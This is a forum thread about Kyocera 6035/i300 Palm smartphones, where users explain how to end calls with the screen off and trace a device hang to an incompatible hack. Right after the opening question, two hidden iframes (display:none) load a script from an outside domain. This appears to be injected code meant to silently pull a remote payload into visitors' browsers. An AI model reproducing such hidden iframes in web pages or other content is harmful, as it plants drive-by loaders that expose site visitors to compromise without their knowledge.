+ Reply to Thread

How to End Call?

Quick observation:

When I want to end a phone call, and the screen is off, is there any way to end call without having to power on the screen and hit End?

Thanks!!<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Press the Phone button - bottom button on right.

Although I always get a little nervous relying on this, the calls end themselves! Of course, I always listen for the other caller to disconnect first, but so far, it has been flawless.

Craig

there are a few times when the calls wont end themselves immediately. i posted that solution a while ago, and then paid more attention to it, adn realized that the voicemail doesnt hang up soon enough, and sometimes calls from landline phones do not register as hanging up on the i300 too quickly either. makes me kinda nervous sometimes. PCS to PCS is a different story, and almost always hangs up almost immediately.

Originally posted by abward
    Press the Phone button - bottom button on right.
    Hit the Phone button twice. First time turns the display on, second time hangs up the phone. Sometimes once works, but twice always will.
    Cliff

Yes if the screen is on in phone mode hitting the button once will do. If the screen is on in any other mode you must hit twice, and if the screen is off you must first hit the button to turn on the screen and then hit once more.

How to end a call without having to reset it

For some reason, nearly every time I try to end a call - with the end, or voice/record button or with the ear bob - the device hangs. So, based on this thread, if I push the phone button after finishing a call, that button will hang up the phone without hanging the device? It's rather counter-intuitive and frustrating that you can't hang up using the bob when you use the bob to initiate the call. Likewise, starting the call with the talk button and not use the end button to hang up. I too don't like to wait until my device disconnects the call (I've had some rather embarrassing moments when I thought I was off the phone and wasn't!).

I will try the phone button on the bottom right. At this point, anything so that I don't have 'reset anxiety' when disconnecting the call (besides, having a cool device isn't cool if you have to disengage the phone from the case, extract the stylus, unscrew the reset nob, and pock the reset hole).

Administrator

Arrow

well of course your phone does not work as it should... have you done a cold boot of the phone and did a test call all BEFORE hotsyncing the phone?

Cold boot? No. How do you do a cold boot. I did, however, make calls before hot syncing. What now?

Administrator

Arrow

excuse my vernacular...

did you do a cold reset and make a test call before you even did a hotsync? its possible that there is an app or hack causing you grief...

1. The phone was used before hotsyncing.
    2. I will disable my hacks one by one and see if that helps
    3. If that doesn't work, I don't have any problem with a hard reset. I have everything backed up.
    4. The only other problem is during hot syncing when the palm shows the message about the installer incompatability - v3.5.3 and notes that I can delete the file - which I do. But that hasn't stopped any transfer of Pocket Quicken, Wordsmith, or ActionNames data.

Arrow

OK. I tested all my hacks. Magictext, Launch Em App, Popup note, Popup calc and Fix AN find and they all worked and permitted a graceful disconnect. MiddleCaps Hack was the problem and I deleted it. I will keep my figures crossed that that solved the issue.

Thanks for the help, Marctronixx.

BTW, I noticed, just now, that another thread was listing hack problems and this hack was noted as incompatible. I could have saved you and me a bit of time if I had suspected a problem hack. But it is interesting that one user has no problem with MiddleCaps (which I liked a lot on my PalmIIIx) and that another had problems with Popup note (where I don't). We should compare versons as well as programs.

Administrator

Arrow

yeah sometimes its not just the hack but a combination of other programs.

for example, a lot of folks have had bad issues with the AIM client, while i have had zero problems with it over 2 different phones (6035 and i300). so its just the combination that the phone doesnt like...